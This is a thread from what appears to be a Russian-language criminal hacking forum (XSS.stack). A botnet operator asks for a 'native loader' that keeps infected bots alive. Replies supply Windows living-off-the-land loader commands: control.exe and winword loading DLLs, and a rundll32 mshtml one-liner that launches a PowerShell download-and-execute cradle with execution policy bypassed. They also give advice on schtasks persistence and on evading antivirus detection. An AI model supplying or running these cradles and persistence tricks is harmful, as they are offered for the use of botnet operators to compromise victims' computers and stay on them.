• XSS.stack #1 – первый литературный журнал от юзеров форума

Подскажите актуальный, хороший, нативный лоадер

Отслеживать
Ingiborga

Ingiborga

(L3) cache
Забанен
Регистрация
12.12.2020
Сообщения
177
Реакции
43
Пожалуйста, обратите внимание, что пользователь заблокирован
Главный критерий это живучесть ботов.
Надо отправлять ботов в сейв. Трафик большой не успеваю обработать всех. Хочется засейвить их что бы потом можно было прогрузить что то туда.
слышал смок вроде как еще актуален, есть смысл его брать или есть более лучшие альтернативы.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
легко =)
control.exe FILE_PATH.dll - нативней некуда =)
winword /l FILE_PATH.dll - менее нативно (необходим ворд), но КулХацкерамКоторыеПоСетям будет в самый раз эти два =) Первый еще позволяет загружать .cpl (что также снимает ограничение на подписанные бинарники, смарт)

Ну и мой любимый. Тут недавно ребята с пеной доказывали про павершелл с параметрами)) в тот день им хватило конечно))) уж не стал до конца их... разубеждать))) короче
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('URL');") - вполне стандартная ситуация для винды - rundll32 -чего она только не видела =)

ой.. сорян.. а ты наверное спрашивал про платные компилированые фразочки?))) или тебе нужны "PowerShell Download Cradles"? В общем как то так ;-) Ну а "сейвит" более чем отлично schtasks. Смок закурит, запускай через повышенные права, пробрасывай длл в %SYSWOW% и ставь таймер на раз в 15 дней - лучше для этогоиспользуй азур - создай записку с инструкциями))) как бабушке на холодильник) Чем не лоадер?))) Нативный?)) более чем) Ну и еще один не удержался: лепи что хочешь через повышенные к userlogon.exe = один из моих любимых)))
 
Последнее редактирование:
x4k сказал(а):
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('URL');")
Ты с такой конструкцией даже до закрепления не дойдёшь. Любой адекватный авер сожрет такой старт.
x4k сказал(а):
Ну а "сейвит" более чем отлично schtasks.
Без indirect execution к примеру nod32 запалит такую таску. Если на запуск будет идти сомнительный исполняемый файл. Но в целом способ норм. Так что согласен.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Haunt сказал(а):
Ты с такой конструкцией даже до закрепления не дойдёшь. Любой адекватный авер сожрет такой старт.

Без indirect execution к примеру nod32 запалит такую таску. Если на запуск будет идти сомнительный исполняемый файл. Но в целом способ норм. Так что согласен.
Привет =) это просто one-lin3r не более ;-)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх